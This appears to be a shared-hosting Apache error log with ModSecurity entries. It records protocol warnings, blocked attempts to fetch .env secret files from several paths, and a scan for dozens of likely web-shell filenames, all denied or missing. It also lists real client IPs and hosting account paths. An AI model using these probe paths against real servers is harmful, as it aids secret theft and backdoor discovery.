[Mon May 11 21:09:18.931138 2026] [security2:error] [pid 1511173:tid 1511181] [client 43.167.245.18:38616] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/la-baujue-est-dispo-a-casabio-chambery-au-terroir-alpin-drumettaz-clarafond-et-a-aixtra-bio-aix-les-bains/"] [unique_id "agIpXvjVc-A-CSptvm14IwAAAEU"]
[Mon May 11 21:09:29.569780 2026] [ssl:error] [pid 1511173:tid 1511199] (EAI 2)Name or service not known: [client 44.250.205.138:49286] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:09:29.570223 2026] [ssl:error] [pid 1511173:tid 1511199] AH01941: stapling_renew_response: responder error
[Mon May 11 21:09:40.685099 2026] [authz_core:error] [pid 1511173:tid 1511187] [client 111.225.148.155:47904] AH01630: client denied by server configuration: /home/piregwan/public_html/testmail/error_log
[Mon May 11 21:09:43.926475 2026] [authz_core:error] [pid 1511173:tid 1511197] [client 168.138.172.235:60695] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/error_log
[Mon May 11 21:09:44.281220 2026] [authz_core:error] [pid 1511173:tid 1511197] [client 168.138.172.235:60695] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/error_log
[Mon May 11 21:09:46.289263 2026] [authz_core:error] [pid 1501831:tid 1501835] [client 216.73.216.110:40280] AH01630: client denied by server configuration: /home/missmand/public_html/vendor/cocur/slugify/tests/Bridge/Nette/error_log
[Mon May 11 21:09:55.320107 2026] [security2:error] [pid 1501883:tid 1501902] [client 43.157.46.118:38392] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "apoe.fr"] [uri "/actualites.html"] [unique_id "agIpgzP5Q_-MBliRCAxtdQAAABE"], referer: http://apoe.fr/actualites.html
[Mon May 11 21:10:18.400693 2026] [security2:error] [pid 1516058:tid 1516111] [client 142.248.80.222:21844] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/app/.env"] [unique_id "agIpmiMeXtzav-mi9Sy3rAAAANU"]
[Mon May 11 21:10:18.401025 2026] [security2:error] [pid 1516058:tid 1516111] [client 142.248.80.222:21844] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/app/.env"] [unique_id "agIpmiMeXtzav-mi9Sy3rAAAANU"]
[Mon May 11 21:10:18.421360 2026] [security2:error] [pid 1501883:tid 1501903] [client 142.248.80.222:21822] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agIpmjP5Q_-MBliRCAxtkgAAABI"]
[Mon May 11 21:10:18.421570 2026] [security2:error] [pid 1501883:tid 1501903] [client 142.248.80.222:21822] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agIpmjP5Q_-MBliRCAxtkgAAABI"]
[Mon May 11 21:10:18.422516 2026] [security2:error] [pid 1501883:tid 1501904] [client 142.248.80.222:21816] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agIpmjP5Q_-MBliRCAxtkwAAABM"]
[Mon May 11 21:10:18.422709 2026] [security2:error] [pid 1501883:tid 1501904] [client 142.248.80.222:21816] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agIpmjP5Q_-MBliRCAxtkwAAABM"]
[Mon May 11 21:10:18.423898 2026] [security2:error] [pid 1534836:tid 1534888] [client 142.248.80.222:21854] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/api/.env"] [unique_id "agIpmteaRXe5lR8y0ZOY8wAAAVE"]
[Mon May 11 21:10:18.424069 2026] [security2:error] [pid 1534836:tid 1534888] [client 142.248.80.222:21854] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/api/.env"] [unique_id "agIpmteaRXe5lR8y0ZOY8wAAAVE"]
[Mon May 11 21:10:18.471002 2026] [security2:error] [pid 1534836:tid 1534878] [client 142.248.80.222:21866] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agIpmteaRXe5lR8y0ZOY9AAAAUc"]
[Mon May 11 21:10:18.471205 2026] [security2:error] [pid 1534836:tid 1534878] [client 142.248.80.222:21866] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agIpmteaRXe5lR8y0ZOY9AAAAUc"]
[Mon May 11 21:10:18.475808 2026] [security2:error] [pid 1511173:tid 1511182] [client 142.248.80.222:21828] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agIpmvjVc-A-CSptvm15AwAAAEY"]
[Mon May 11 21:10:18.475960 2026] [security2:error] [pid 1511173:tid 1511182] [client 142.248.80.222:21828] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agIpmvjVc-A-CSptvm15AwAAAEY"]
[Mon May 11 21:10:18.995515 2026] [security2:error] [pid 1516058:tid 1516111] [client 142.248.80.222:21844] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agIpmiMeXtzav-mi9Sy3rAAAANU"]
[Mon May 11 21:10:19.071130 2026] [security2:error] [pid 1501883:tid 1501903] [client 142.248.80.222:21822] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agIpmjP5Q_-MBliRCAxtkgAAABI"]
[Mon May 11 21:10:19.073587 2026] [security2:error] [pid 1501883:tid 1501904] [client 142.248.80.222:21816] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agIpmjP5Q_-MBliRCAxtkwAAABM"]
[Mon May 11 21:10:19.091414 2026] [security2:error] [pid 1534836:tid 1534878] [client 142.248.80.222:21866] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agIpmteaRXe5lR8y0ZOY9AAAAUc"]
[Mon May 11 21:10:19.100555 2026] [security2:error] [pid 1534836:tid 1534888] [client 142.248.80.222:21854] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agIpmteaRXe5lR8y0ZOY8wAAAVE"]
[Mon May 11 21:10:19.432726 2026] [security2:error] [pid 1511173:tid 1511182] [client 142.248.80.222:21828] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agIpmvjVc-A-CSptvm15AwAAAEY"]
[Mon May 11 21:10:40.476585 2026] [:error] [pid 1516058:tid 1516105] [client 8.231.219.86:42170] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 21:10:40.632209 2026] [:error] [pid 1516058:tid 1516105] [client 8.231.219.86:42170] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 21:10:40.785366 2026] [:error] [pid 1516058:tid 1516105] [client 8.231.219.86:42170] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 21:10:40.938977 2026] [:error] [pid 1516058:tid 1516105] [client 8.231.219.86:42170] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 21:10:41.091963 2026] [:error] [pid 1516058:tid 1516105] [client 8.231.219.86:42170] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 21:10:41.244816 2026] [:error] [pid 1516058:tid 1516105] [client 8.231.219.86:42170] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 21:10:41.398620 2026] [autoindex:error] [pid 1516058:tid 1516105] [client 8.231.219.86:42170] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 21:10:48.097765 2026] [security2:error] [pid 1501883:tid 1501905] [client 49.51.243.95:49864] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIpuDP5Q_-MBliRCAxt5QAAABQ"]
[Mon May 11 21:11:19.666322 2026] [authz_core:error] [pid 1511173:tid 1511197] [client 216.73.216.110:18110] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/cron/error_log
[Mon May 11 21:11:49.274944 2026] [ssl:error] [pid 1501883:tid 1501892] (EAI 2)Name or service not known: [client 47.128.59.58:11332] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:11:49.274997 2026] [ssl:error] [pid 1501883:tid 1501892] AH01941: stapling_renew_response: responder error
[Mon May 11 21:12:25.709996 2026] [security2:error] [pid 1516058:tid 1516093] [client 43.157.22.57:54792] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.homin.fr"] [uri "/"] [unique_id "agIqGSMeXtzav-mi9Sy4twAAAMM"]
[Mon May 11 21:12:27.940765 2026] [security2:error] [pid 1516058:tid 1516102] [client 43.157.22.57:57750] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.homin.fr"] [uri "/fr/"] [unique_id "agIqGyMeXtzav-mi9Sy4wQAAAMw"], referer: http://www.homin.fr
[Mon May 11 21:12:39.431761 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/kaza.php
[Mon May 11 21:12:39.520864 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/wsd.php
[Mon May 11 21:12:39.610067 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/gifclass4.php
[Mon May 11 21:12:39.699013 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/333.php
[Mon May 11 21:12:39.788776 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/cfile.php
[Mon May 11 21:12:39.878367 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/bless3.php
[Mon May 11 21:12:39.967484 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/bless.php
[Mon May 11 21:12:40.056746 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/doti.php
[Mon May 11 21:12:40.146068 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/031.php
[Mon May 11 21:12:40.243960 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/wfile.php
[Mon May 11 21:12:40.333307 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/lala.php
[Mon May 11 21:12:40.422583 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/gmo.php
[Mon May 11 21:12:40.512234 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/he.php
[Mon May 11 21:12:40.601393 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/plss3.php
[Mon May 11 21:12:40.690295 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/ton.php
[Mon May 11 21:12:40.779126 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/nfile.php
[Mon May 11 21:12:40.867971 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/ffile.php
[Mon May 11 21:12:40.956905 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/file18.php
[Mon May 11 21:12:41.046331 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/file21.php
[Mon May 11 21:12:41.135419 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/yellow.php
[Mon May 11 21:12:41.224774 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/file1.php
[Mon May 11 21:12:41.323183 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/file4.php
[Mon May 11 21:12:41.412476 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/file88.php
[Mon May 11 21:12:41.502072 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/111.php
[Mon May 11 21:12:41.591240 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/file8.php
[Mon May 11 21:12:41.687136 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/file2.php
[Mon May 11 21:12:41.776210 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/vee.php
[Mon May 11 21:12:41.865195 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/a2.php
[Mon May 11 21:12:41.954222 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/mlex.php
[Mon May 11 21:12:42.043573 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/030.php
[Mon May 11 21:12:42.137210 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/haa.php
[Mon May 11 21:12:42.226454 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/xsox.php
[Mon May 11 21:12:42.315924 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/classgoto24.php
[Mon May 11 21:12:42.405114 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/inde.php
[Mon May 11 21:12:42.494091 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/akk.php
[Mon May 11 21:12:42.583375 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/alpa.php
[Mon May 11 21:12:42.673659 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/finny.php
[Mon May 11 21:12:42.770576 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/file15.php
[Mon May 11 21:12:42.865233 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/0x0x.php
[Mon May 11 21:12:42.954493 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/2clas.php
[Mon May 11 21:12:43.043941 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/file9.php
[Mon May 11 21:12:43.135491 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/aaa.php
[Mon May 11 21:12:43.224838 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/ilex.php
[Mon May 11 21:12:43.314139 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/tor.php
[Mon May 11 21:12:43.403348 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/klex.php
[Mon May 11 21:12:43.503236 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/shell1.php
[Mon May 11 21:12:43.592545 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/sec.php
[Mon May 11 21:12:43.699236 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/filesss.php
[Mon May 11 21:12:43.788549 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/ea.php
[Mon May 11 21:12:43.884702 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/gi.php
[Mon May 11 21:12:43.991260 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/10.php
[Mon May 11 21:12:44.083691 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/11.php
[Mon May 11 21:12:44.173051 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/12.php
[Mon May 11 21:12:44.262295 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/13.php
[Mon May 11 21:12:44.351940 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/hi.php
[Mon May 11 21:12:44.441351 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/v.php
[Mon May 11 21:12:44.541351 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/ar.php
[Mon May 11 21:12:44.630576 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/article.php
[Mon May 11 21:12:44.720772 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/install.php
